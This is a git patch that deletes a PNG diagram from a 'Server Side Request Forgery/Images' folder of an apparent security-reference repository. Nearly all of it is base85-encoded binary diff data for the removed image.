From 35e64b2275d76d7f4bab3b1f75e5432d1a676a3e Mon Sep 17 00:00:00 2001 From: nismo-s13 <56898573+nismo-s13@users.noreply.github.com> Date: Wed, 24 Nov 2021 17:47:39 +1300 Subject: [PATCH 01/69] Delete Parser & Curl < 7.54.png --- .../Images/Parser & Curl < 7.54.png | Bin 183399 -> 0 bytes 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 Server Side Request Forgery/Images/Parser & Curl < 7.54.png diff --git a/Server Side Request Forgery/Images/Parser & Curl < 7.54.png b/Server Side Request Forgery/Images/Parser & Curl < 7.54.png deleted file mode 100644 index 76fe429a8a8afca5ced15331ce4000bc0fcb0145..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 183399 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%0DeOos% zVRJBg9@?LqMoGy43aUZFRW05lGd8d-1HARvG7$BMmLED+tLqKE(nqp-Qu{w($)`Ub zl>PwUOoZ)B{YE*5JU!Xdt;3G4UWH!N;6q`7SS4g_-sJ=* zo!wuzE<*sY4%jLXSbV1n4H5E2i?QRUIQr7dxMq`%7;+yx&s0r_D5d4}SGS{j`m&qB z5uUN<%PQ)5s>{BNl0m$zr(blDrfV-%9Qy$98;caqZhhzJBxA%gbF9oB;pL50j;b)7 zb%{()Vsb?DkjoZ3k`;Oyy|I%#!UOYfp$vsGU>j<7-kS>A+tH}I!U?WCdsCauOzk5oFbV{ILjbTZPhU#1srvlb{uu-=7X<4~0RTO*&uJJ> 